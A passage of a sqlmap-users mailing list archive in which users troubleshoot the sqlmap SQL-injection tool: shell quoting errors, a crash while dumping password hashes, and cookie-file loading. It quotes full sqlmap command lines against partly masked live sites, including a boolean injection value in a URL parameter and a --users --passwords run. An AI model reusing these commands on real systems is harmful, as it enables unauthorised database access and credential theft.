Re: [sqlmap-users] sqlmap-user event not found error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap-user event not found error
|
From: Miroslav S. <mir...@gm...> - 2014-05-11 14:39:18
|
Hi Bob. Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...) Kind regards, Miroslav Stampar On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote: > Hi friend, > > I have problem with ! inside URL . > > /sqlmap.py -u > http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del= > bash: !search.do?keyword=: event not found > > How should i do ? > > thanks > > bob > ------------------ > > > > > ------------------ Original ------------------ > *From: * "Miroslav Stampar";<mir...@gm...>; > *Date: * Fri, May 31, 2013 03:00 AM > *To: * "Bob"<sto...@qq...>; > *Cc: * "sqlmap-users"<sql...@li...>; > *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1 > > Hi. > Have you been able to retrieve user names normally? I mean, were they > normally been displayed in console output? > Also, is boolean technique the only one detected by sqlmap in your case > (or maybe UNION)? > Kind regards, > Miroslav Stampar > > > On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote: > >> Hi friend, >> >> >> Could you help me with this bug ? >> >> >> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your >> run with the latest development version from the GitHub repository. If the >> exception persists, please send by e-mail to ' >> sql...@li...' or open a new issue at ' >> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> text and any information required to reproduce the bug. The developers will >> try to reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 1.0-dev >> Python version: 2.7.3 >> Operating system: posix >> Command line: ./sqlmap -u *********************************************** >> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP >> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft >> SQL Server --users --passwords >> Technique: BOOLEAN >> Back-end DBMS: Microsoft SQL Server (fingerprinted) >> Traceback (most recent call last): >> File "./sqlmap", line 87, in main >> start() >> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start >> action() >> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action >> conf.dbmsHandler.getPasswordHashes(), "password hash", >> CONTENT_TYPE.PASSWORDS) >> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in >> getPasswordHashes >> if user in retrievedUsers: >> TypeError: unhashable type: 'list' >> >> [*] shutting down at 22:54:12 >> Thanks >> >> BOB >> >> >> ------------------ Original ------------------ >> *From: * "sqlmap-users-request"< >> sql...@li...>; >> *Date: * May 29, 2013 >> *To: * "sqlmap-users"<sql...@li...>; >> *Subject: * sqlmap-users Digest, Vol 31, Issue 1 >> >> Send sqlmap-users mailing list submissions to >> sql...@li... >> >> To subscribe or unsubscribe via the World Wide Web, visit >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> or, via email, send a message with subject or body 'help' to >> sql...@li... >> >> You can reach the person managing the list at >> sql...@li... >> >> When replying, please edit your Subject line so it is more specific >> than "Re: Contents of sqlmap-users digest..." >> >> >> Today's Topics: >> >> 1. Re: Feature request (David Guimaraes) >> 2. Re: --load-cookies (Dirk Wetter) >> 3. Re: --load-cookies (Miroslav Stampar) >> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem >> (Miroslav Stampar) >> 5. Re: --load-cookies (Dirk Wetter) >> 6. --host parameter (co...@5i...) >> 7. Sqlmap and direct connect error (???????? ??????) >> 8. Re: --host parameter (Miroslav Stampar) >> 9. Re: Sqlmap and direct connect error (Miroslav Stampar) >> 10. feature request: offline mode for --dns-domain? (buawig) >> 11. feature request: --dns-domain for non-root users (--dns-port) >> (buawig) >> 12. Domain credentials (Brian Milliron) >> 13. Re: Domain credentials (Brandon Perry) >> 14. Re: feature request: offline mode for --dns-domain? >> (Miroslav Stampar) >> 15. Re: Domain credentials (Miroslav Stampar) >> 16. Re: feature request: fetch DNS queries from DNS server via >> HTTP (buawig) >> 17. Re: feature request: fetch DNS queries from DNS server via >> HTTP (Miroslav Stampar) >> 18. MySQL error based technique bug (Konrads Smelkovs) >> 19. Re: MySQL error based technique bug (Miroslav Stampar) >> 20. SQLmap crashing (Phillip Wylie) >> 21. Re: SQLmap crashing (Miroslav Stampar) >> 22. Custom injection payload in POST (Marcell Fodor) >> 23. Re: SQLmap crashing (Miroslav Stampar) >> 24. I got error on windows (warezhacking) >> 25. Appending to a dump (Stephen Shkardoon) >> 26. Re: Appending to a dump (Miroslav Stampar) >> 27. Re: Appending to a dump (Stephen Shkardoon) >> 28. Re: Appending to a dump (Miroslav Stampar) >> 29. --ignore-404 ? (buawig) >> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (buawig) >> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (Miroslav Stampar) >> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' >> from 1 for 1) (Miroslav Stampar) >> 33. Re: --ignore-404 ? (Miroslav Stampar) >> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) >> 35. Re: BUG...!!!! o.O (Miroslav Stampar) >> 36. gun...@gm... wants to follow you. Accept? >> (gun...@gm...) >> 37. Direct access to mysql database (Marcell Fodor) >> 38. Re: Direct access to mysql database (Miroslav Stampar) >> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... >> (Badoo) >> 40. Not getting any sensitive data from database (Marcell Fodor) >> 41. Re: Not getting any sensitive data from database >> (Miroslav Stampar) >> 42. unhandled exception (kvasilopoulos) >> 43. [SQLMAP] Unhandled exception for IPv6 >> (e.n...@st...) >> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >> 45. Re: unhandled exception (Miroslav Stampar) >> 46. Passing SOAPAction in --header (Brandon Perry) >> 47. Re: Passing SOAPAction in --header (Miroslav Stampar) >> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) >> 49. Blind SQL Injection question (Guy Dufour) >> 50. Re: Blind SQL Injection question (Chris Oakley) >> 51. Re: Passing SOAPAction in --header (Brandon Perry) >> 52. Re: Passing SOAPAction in --header (Brandon Perry) >> 53. Deploy&Create SSH/tunnel with compromised MSSQL server >> (Alok Kumar) >> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Brandon Perry) >> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Alok Kumar) >> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server >> (Brandon Perry) >> 57. SQLMAP Bug (Joe O'Hara) >> 58. Re: SQLMAP Bug (Miroslav Stampar) >> 59. [CRITICAL] (Thai Thao) >> 60. Re: [CRITICAL] (Miroslav Stampar) >> 61. Providing multiple dbms (Sebastian Nerz) >> 62. Re: Providing multiple dbms (Miroslav Stampar) >> >> >> ---------------------------------------------------------------------- >> >> Message: 1 >> Date: Sat, 13 Apr 2013 21:40:39 -0300 >> From: David Guimaraes <sk...@gm...> >> Subject: Re: [sqlmap-users] Feature request >> To: Miroslav Stampar <mir...@gm...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CAJ...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Good question Miroslav.. I tried to think in something that can be >> implemented without ruin sqlmap query schema, but I could not come to any >> conclusion... =( >> >> The thing is, sqlsus use a different approch to dump the data, making this >> kind of thing possible... >> >> The solution that I found in this particular scenario is to use sqlsus, >> unfortunately... >> >> Regards. >> >> David >> >> >> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar < >> mir...@gm... >> > wrote: >> >> > Hi David. >> > >> > And what do you recommend to be done in case of query with length > >> > max_inj_length? >> > >> > Kind regards, >> > Miroslav Stampar >> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: >> > >> >> Hi, I am trying to perform sql injection on a web site but I can not >> get >> >> successful due to a size limitation on the query sent to the server. >> The >> >> server is limiting the size of query in 512 bytes only and sqlmap do >> not >> >> have any customization that allows me to bypass this restriction like >> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called >> "autoconf" >> >> that measure the permited query size. >> >> >> >> There is some chance to put this kind of feature in sqlmap? >> >> >> >> Thanks. >> >> >> >> -- >> >> David Gomes Guimar?es >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> Own the Future-Intel® Level Up Game Demo Contest 2013 >> >> Rise to greatness in Intel's independent game demo contest. >> >> Compete for recognition, cash, and the chance to get your game >> >> on Steam. $5K grand prize plus 10 genre and skill prizes. >> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d >> >> _______________________________________________ >> >> sqlmap-users mailing list >> >> sql...@li... >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> >> >> -- >> David Gomes Guimar?es >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 2 >> Date: Mon, 15 Apr 2013 11:36:37 +0200 >> From: Dirk Wetter <sp...@dr...> >> Subject: Re: [sqlmap-users] --load-cookies >> To: Miroslav Stampar <mir...@gm...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: <516...@dr...> >> Content-Type: text/plain; charset=ISO-8859-1 >> >> >> >> On 04/14/2013 01:14 AM, Miroslav Stampar wrote: >> > Nevertheless, with the latest commit that check should be "neutralized" >> now. Could you please retry it now? >> >> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib >> hiccups, using the same file: >> >> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug! >> Traceback (most recent call last): >> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load >> assert domain_specified == initial_dot >> AssertionError >> >> _warn_unhandled_exception() >> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid >> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': >> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') >> >> the 999.. looks strange to me. >> >> > >> > >> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < >> mir...@gm... <mailto:mir...@gm...>> wrote: >> > >> > Hi Dirk. >> > >> > Well, I would say that you have an expired cookie. Do you see that >> value 0? That value should be a valid UNIX time representing time of cookie >> expiration. Also, I've just tested that cookie of yours and sqlmap says: >> "[WARNING] cookie '....' has expired" >> > >> >> that's true but IMO 0 represents just a session cookie. Example: >> >> prompt% wget -q -O /dev/null --keep-session-cookies >> --save-cookies=/dev/stdout bing.com >> # HTTP cookie file. >> # Generated by Wget on 2013-04-15 11:23:13. >> # Edit at your own risk. >> >> .bing.com TRUE / FALSE 1429089794 SRCHUSR >> AUTOREDIR=0&GEOVAR=&DOB=20130415 >> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM >> .bing.com TRUE / FALSE 1429089794 OrigMUID >> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe >> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314 >> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7 >> .bing.com TRUE / FALSE 0 _HOP >> .bing.com TRUE / FALSE 0 _FS NU=1 >> .bing.com TRUE / FALSE 1429089794 _FP EM=1 >> www.bing.com FALSE / FALSE 1429089794 SRCHUID >> V=2&GUID=975091780DFF407DA9DD07139FD97C4D >> www.bing.com FALSE / FALSE 1429089794 MUIDB >> 333995A69E06630B2EB491169F016314 >> >> prompt% >> >> Same parser problem btw if I edit the cookie file and put 1429089794 unix >> time instead of 0 in there. >> >> Ok: With the prev rev ed5599f it reads this file ok (no session cookies >> but cookies w/ expiration date) and uses the last >> cookie only for the first 120 tries. >> >> Cheers, Dirk >> >> >> > >> > Kind regards, >> > Miroslav Stampar >> > >> > >> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...>> wrote: >> > >> > >> > Hi Miroslav, >> > >> > thx for your prompt answer. >> > >> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: >> > > Hi Dirk. >> > > >> > > Could you please get the latest revision and retry it again? >> > ed5599f: almost the same: with cookie in the header sqlmap takes only >> this one. >> > The slight difference seems to be that in the case where I didn't >> supply a cookie >> > sqlmap doesn't use any cookie at all, i.e. now not the one from the >> server anymore. >> > > >> > > There was a situation where info messages have been wrongly written >> that original response contained Set-Cookie in situations like yours. >> > > >> > > In case that everything stays as it is, I'll need to ask you to >> provide more details. For example, cookie file would be great. >> > >> > sure, here you go: >> > >> > --snip >> > # Netscape HTTP Cookie File >> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie> >> > [..] >> > --snap >> > >> > They are all session cookies. For easier reading here I put some blanks >> in the line >> > above, in "cookie-file" there aren't any though. Cookies were generated >> with >> > stompy and a shell script (looks he same as with >> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>) >> > >> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-) >> > >> > > >> > > Also, please make sure that the cookie file contains proper cookie(s) >> - domain name should be the same as a domain of target, cookie needs to >> have a proper valid time, etc. >> > >> > see above. >> > >> > Cheers, >> > >> > Dirk >> > >> > > >> > > >> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> >> wrote: >> > > >> > > Hi Miroslav, >> > > >> > > yes unfortunately. >> > > >> > > If I omit the cookie line in the request header completely, sqlmap >> > > seems to take the first cookie issued by the server with set-cookie >> (and >> > > put's it silently in). >> > > >> > > Cheers, >> > > >> > > Dirk >> > > >> > > >> > > >> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: >> > > > Hi. >> > > > >> > > > And this is also happening if you are skipping "Cookie: >> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? >> > > > >> > > > Kind regards, >> > > > Miroslav Stampar >> > > > >> > > > >> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>>> wrote: >> > > > >> > > > >> > > > Hi folks, >> > > > >> > > > .... that doesn't work for me. It always uses the cookie supplied >> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one >> > > > from the 1st server reply is being used) >> > > > >> > > > So what is wrong in here: >> > > > >> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce >> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ >> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ >> > > > --level=2 --risk=2 -r $REQUEST >> > > > >> > > > The content of the file $REQUEST is: >> > > > >> > > > POST <URL> HTTP/1.1 >> > > > Host: <HOST> >> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) >> AppleWebKit/525.13 (KHTML, like Gecko) >> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> < >> http://0.2.149.6> Safari/525.13 >> > > > Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> > > > Accept-Language: en-US,en;q=0.5 >> > > > Accept-Encoding: gzip, deflate >> > > > Referer: <Referer> >> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 >> > > > Connection: keep-alive >> > > > Content-Type: application/x-www-form-urlencoded >> > > > Content-Length: 67 >> > > > >> > > > <abunchofpostparams> >> > > > >> > > > >> > > > No hints that cookie-file is not in correct format (I've been >> through this, >> > > > at least I think I so ;) ). >> > > > >> > > > Any insight would be much appreciated. >> > > > >> > > > >> > > > Cheers, >> > > > >> > > > Dirk >> > > > >> > > > >> > > > >> ------------------------------------------------------------------------------ >> > > > Precog is a next-generation analytics platform capable of advanced >> > > > analytics on semi-structured data. The platform includes APIs for >> building >> > > > apps and a phenomenal toolset for data science. Developers can use >> > > > our toolset for easy data analysis & visualization. Get a free >> account! >> > > > http://www2.precog.com/precogplatform/slashdotnewsletter >> > > > _______________________________________________ >> > > > sqlmap-users mailing list >> > > > sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>> <mailto: >> sql...@li... <mailto: >> sql...@li...> <mailto: >> sql...@li... <mailto: >> sql...@li...>>> >> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > >> > > > >> > > > >> > > > >> > > > -- >> > > > Miroslav Stampar >> > > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > >> > >> > >> > >> > -- >> > Miroslav Stampar >> > http://about.me/stamparm >> > >> > >> > >> > >> > -- >> > Miroslav Stampar >> > http://about.me/stamparm >> >> >> >> >> ------------------------------ >> >> Message: 3 >> Date: Mon, 15 Apr 2013 11:45:19 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] --load-cookies >> To: Dirk Wetter <sp...@dr...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Hi Dirk. >> >> Now that crash should be "patched". >> >> Could you please retry it now and say if the latest revision suits your >> needs? >> >> Kind regards, >> Miroslav Stampar >> >> >> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote: >> >> > >> > >> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote: >> > > Nevertheless, with the latest commit that check should be >> "neutralized" >> > now. Could you please retry it now? >> > >> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib >> > hiccups, using the same file: >> > >> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib >> bug! >> > Traceback (most recent call last): >> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in >> > _really_load >> > assert domain_specified == initial_dot >> > AssertionError >> > >> > _warn_unhandled_exception() >> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid >> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': >> > >> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') >> > >> > the 999.. looks strange to me. >> > >> > > >> > > >> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar < >> > mir...@gm... <mailto:mir...@gm...>> wrote: >> > > >> > > Hi Dirk. >> > > >> > > Well, I would say that you have an expired cookie. Do you see that >> > value 0? That value should be a valid UNIX time representing time of >> cookie >> > expiration. Also, I've just tested that cookie of yours and sqlmap says: >> > "[WARNING] cookie '....' has expired" >> > > >> > >> > that's true but IMO 0 represents just a session cookie. Example: >> > >> > prompt% wget -q -O /dev/null --keep-session-cookies >> > --save-cookies=/dev/stdout bing.com >> > # HTTP cookie file. >> > # Generated by Wget on 2013-04-15 11:23:13. >> > # Edit at your own risk. >> > >> > .bing.com TRUE / FALSE 1429089794 SRCHUSR >> > AUTOREDIR=0&GEOVAR=&DOB=20130415 >> > .bing.com TRUE / FALSE 1429089794 SRCHD >> > D=2781203&MS=2781203&AF=NOFORM >> > .bing.com TRUE / FALSE 1429089794 OrigMUID >> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe >> > .bing.com TRUE / FALSE 1429089794 MUID >> > 333995A69E06630B2EB491169F016314 >> > .bing.com TRUE / FALSE 0 _SS >> > SID=B954CB7EDF8643CABAD8013F27A241E7 >> > .bing.com TRUE / FALSE 0 _HOP >> > .bing.com TRUE / FALSE 0 _FS NU=1 >> > .bing.com TRUE / FALSE 1429089794 _FP EM=1 >> > www.bing.com FALSE / FALSE 1429089794 SRCHUID >> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D >> > www.bing.com FALSE / FALSE 1429089794 MUIDB >> > 333995A69E06630B2EB491169F016314 >> > >> > prompt% >> > >> > Same parser problem btw if I edit the cookie file and put 1429089794 >> unix >> > time instead of 0 in there. >> > >> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies >> > but cookies w/ expiration date) and uses the last >> > cookie only for the first 120 tries. >> > >> > Cheers, Dirk >> > >> > >> > > >> > > Kind regards, >> > > Miroslav Stampar >> > > >> > > >> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... >> <mailto: >> > sp...@dr...>> wrote: >> > > >> > > >> > > Hi Miroslav, >> > > >> > > thx for your prompt answer. >> > > >> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: >> > > > Hi Dirk. >> > > > >> > > > Could you please get the latest revision and retry it again? >> > > ed5599f: almost the same: with cookie in the header sqlmap takes >> > only this one. >> > > The slight difference seems to be that in the case where I >> > didn't supply a cookie >> > > sqlmap doesn't use any cookie at all, i.e. now not the one from >> > the server anymore. >> > > > >> > > > There was a situation where info messages have been wrongly >> > written that original response contained Set-Cookie in situations like >> > yours. >> > > > >> > > > In case that everything stays as it is, I'll need to ask you >> > to provide more details. For example, cookie file would be great. >> > > >> > > sure, here you go: >> > > >> > > --snip >> > > # Netscape HTTP Cookie File >> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID >> > \t <Cookie> >> > > [..] >> > > --snap >> > > >> > > They are all session cookies. For easier reading here I put some >> > blanks in the line >> > > above, in "cookie-file" there aren't any though. Cookies were >> > generated with >> > > stompy and a shell script (looks he same as with >> > > wget -S -O /dev/null --keep-session-cookies >> > --save-cookies=<file> <URL>) >> > > >> > > Again: sqlmap doesn't hiccup/complain while eating my cookies >> > file ;-) >> > > >> > > > >> > > > Also, please make sure that the cookie file contains proper >> > cookie(s) - domain name should be the same as a domain of target, cookie >> > needs to have a proper valid time, etc. >> > > >> > > see above. >> > > >> > > Cheers, >> > > >> > > Dirk >> > > >> > > > >> > > > >> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter < >> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... >> <mailto: >> > sp...@dr...>>> wrote: >> > > > >> > > > Hi Miroslav, >> > > > >> > > > yes unfortunately. >> > > > >> > > > If I omit the cookie line in the request header >> > completely, sqlmap >> > > > seems to take the first cookie issued by the server with >> > set-cookie (and >> > > > put's it silently in). >> > > > >> > > > Cheers, >> > > > >> > > > Dirk >> > > > >> > > > >> > > > >> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: >> > > > > Hi. >> > > > > >> > > > > And this is also happening if you are skipping "Cookie: >> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? >> > > > > >> > > > > Kind regards, >> > > > > Miroslav Stampar >> > > > > >> > > > > >> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter < >> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... >> <mailto: >> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr... >> > >> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote: >> > > > > >> > > > > >> > > > > Hi folks, >> > > > > >> > > > > .... that doesn't work for me. It always uses the >> > cookie supplied >> > > > > (below in $REQUEST, or if I omit the line in >> > $REQUEST the one >> > > > > from the 1st server reply is being used) >> > > > > >> > > > > So what is wrong in here: >> > > > > >> > > > > cd >> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce >> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ >> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ >> > > > > --level=2 --risk=2 -r $REQUEST >> > > > > >> > > > > The content of the file $REQUEST is: >> > > > > >> > > > > POST <URL> HTTP/1.1 >> > > > > Host: <HOST> >> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; >> > en-US) AppleWebKit/525.13 (KHTML, like Gecko) >> > > > > Chrome/0.2.149.6 <http://0.2.149.6> < >> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13 >> > > > > Accept: >> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> > > > > Accept-Language: en-US,en;q=0.5 >> > > > > Accept-Encoding: gzip, deflate >> > > > > Referer: <Referer> >> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 >> > > > > Connection: keep-alive >> > > > > Content-Type: application/x-www-form-urlencoded >> > > > > Content-Length: 67 >> > > > > >> > > > > <abunchofpostparams> >> > > > > >> > > > > >> > > > > No hints that cookie-file is not in correct format >> > (I've been through this, >> > > > > at least I think I so ;) ). >> > > > > >> > > > > Any insight would be much appreciated. >> > > > > >> > > > > >> > > > > Cheers, >> > > > > >> > > > > Dirk >> > > > > >> > > > > >> > > > > >> > >> ------------------------------------------------------------------------------ >> > > > > Precog is a next-generation analytics platform >> > capable of advanced >> > > > > analytics on semi-structured data. The platform >> > includes APIs for building >> > > > > apps and a phenomenal toolset for data science. >> > Developers can use >> > > > > our toolset for easy data analysis & visualization. >> > Get a free account! >> > > > > >> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > > > > _______________________________________________ >> > > > > sqlmap-users mailing list >> > > > > sql...@li... <mailto: >> > sql...@li...> <mailto: >> > sql...@li... <mailto: >> > sql...@li...>> <mailto: >> > sql...@li... <mailto: >> > sql...@li...> <mailto: >> > sql...@li... <mailto: >> > sql...@li...>>> >> > > > > >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > >> > > > > >> > > > > >> > > > > >> > > > > -- >> > > > > Miroslav Stampar >> > > > > http://about.me/stamparm >> > > > >> > > > >> > > > >> > > > >> > > > -- >> > > > Miroslav Stampar >> > > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > >> > >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 4 >> Date: Mon, 15 Apr 2013 11:46:21 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in >> clean_filesystem >> To: Brandon Perry <bpe...@gm...> >> Cc: sqlmap users <sql...@li...> >> Message-ID: >> <CA+9yoX3RNQDm=PqT...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Hi Brandon. >> >> Thank you for your patch and find it now included [1]. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224 >> >> >> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm... >> >wrote: >> >> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete >> api >> > call when self.output_directory is NoneType and clean_system() is >> called. >> > >> > -- >> > http://volatile-minds.blogspot.com -- blog >> > http://www.volatileminds.net -- website >> > >> > >> > >> ------------------------------------------------------------------------------ >> > Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! >> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> > >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 5 >> Date: Mon, 15 Apr 2013 12:19:13 +0200 >> From: Dirk Wetter <sp...@dr...> >> Subject: Re: [sqlmap-users] --load-cookies >> To: Miroslav Stampar <mir...@gm...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: <516...@dr...> >> Content-Type: text/plain; charset=ISO-8859-1 >> >> Hi Miroslav, >> >> On 04/15/2013 11:45 AM, Miroslav Stampar wrote: >> > Hi Dirk. >> > >> > Now that crash should be "patched". >> > >> > Could you please retry it now and say if the latest revision suits your >> needs? >> >> cool, thx. Works! >> >> However (sorry): >> >> One needs to omit the cookie in the request header, otherwise it just >> uses the one >> supplied by the request. >> >> Then: It doesn't change the cookie. Maybe I was interpreting that not >> correctly >> but my point was using the 